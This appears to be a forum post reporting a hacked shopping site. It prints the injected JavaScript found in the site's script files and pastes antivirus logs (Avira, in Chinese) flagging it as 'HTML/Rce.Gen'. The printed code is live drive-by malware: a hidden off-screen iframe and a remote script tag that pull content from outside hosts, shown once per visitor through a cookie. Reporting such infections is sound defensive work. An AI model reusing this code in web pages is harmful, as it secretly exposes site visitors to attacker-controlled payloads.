http://talkalotcellular.com/index.php?dispatch=auth.login_form

fireold

1. /*2d3965*/
   
2. 
   
3. function vvt09() {
   
4.     var static = 'ajax';
   
5.     var controller = 'index.php';
   
6.     var vvt = document.createElement('iframe');
   
7.     vvt.src = 'http://ftp.krateris.lt/count.php';
   
8.     vvt.style.position = 'absolute';
   
9.     vvt.style.color = '058';
   
10.     vvt.style.height = '058px';
    
11.     vvt.style.width = '058px';
    
12.     vvt.style.left = '1000058';
    
13.     vvt.style.top = '1000058';
    
14.     if (!document.getElementById('vvt')) {
    
15.         document.write('<p id=\'vvt\' class=\'vvt09\' ></p>');
    
16.         document.getElementById('vvt').appendChild(vvt);
    
17.     }
    
18. }
    
19. function SetCookie(cookieName, cookieValue, nDays, path) {
    
20.     var today = new Date();
    
21.     var expire = new Date();
    
22.     if (nDays == null || nDays == 0) nDays = 1;
    
23.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
24.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
25. }
    
26. function GetCookie(name) {
    
27.     var start = document.cookie.indexOf(name + "=");
    
28.     var len = start + name.length + 1;
    
29.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
30.         return null;
    
31.     }
    
32.     if (start == -1) return null;
    
33.     var end = document.cookie.indexOf(";", len);
    
34.     if (end == -1) end = document.cookie.length;
    
35.     return unescape(document.cookie.substring(len, end));
    
36. }
    
37. if (navigator.cookieEnabled) {
    
38.     if (GetCookie('visited_uq') == 55) {} else {
    
39.         SetCookie('visited_uq', '55', '1', '/');
    
40.         vvt09();
    
41.     }
    
42. } /*/2d3965*/
    
43. 
    
44. /*339810*/
    
45. document.write('<script src="http://salvatorismater.home.pl/ksiegarnia/h7dMfj2I.php" type="text/javascript"></script>') /*/339810*/

复制代码

Avira

2014/2/2 上午 06:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jquery.appear-1.1.1[1].js'
      包含病毒或有害的程式 'HTML/Rce.Gen' [virus]
      已採取動作：
      檔案會移動至 '51aad4bb.qua' 名稱底下的隔離區目錄!

2014/2/2 上午 06:45 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數：        782
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2014/2/2 上午 06:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jquery.appear-1.1.1[1].js 中
      偵測到病毒或有害的程式 'HTML/Rce.Gen [virus]'
      執行的動作：拒絕存取

2014/2/2 上午 06:44 [Web Protection] 發現惡意程式碼
      從 URL "http://talkalotcellular.com/lib/js/tools/tooltip.min.js" 存取資料時，
      發現病毒或有害的程式 'HTML/Rce.Gen' [virus]。
      已採取動作：封鎖的檔案

2014/2/2 上午 06:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jquery.appear-1.1.1[1].js 中
      偵測到病毒或有害的程式 'HTML/Rce.Gen [virus]'
      執行的動作：傳輸至掃描程式

2014/2/2 上午 06:44 [Web Protection] 發現惡意程式碼
      從 URL "http://talkalotcellular.com/lib/js/appear/jquery.appear-1.1.1.js" 存取資料時，
      發現病毒或有害的程式 'HTML/Rce.Gen' [virus]。
      已採取動作：已略過

fs is



Sophos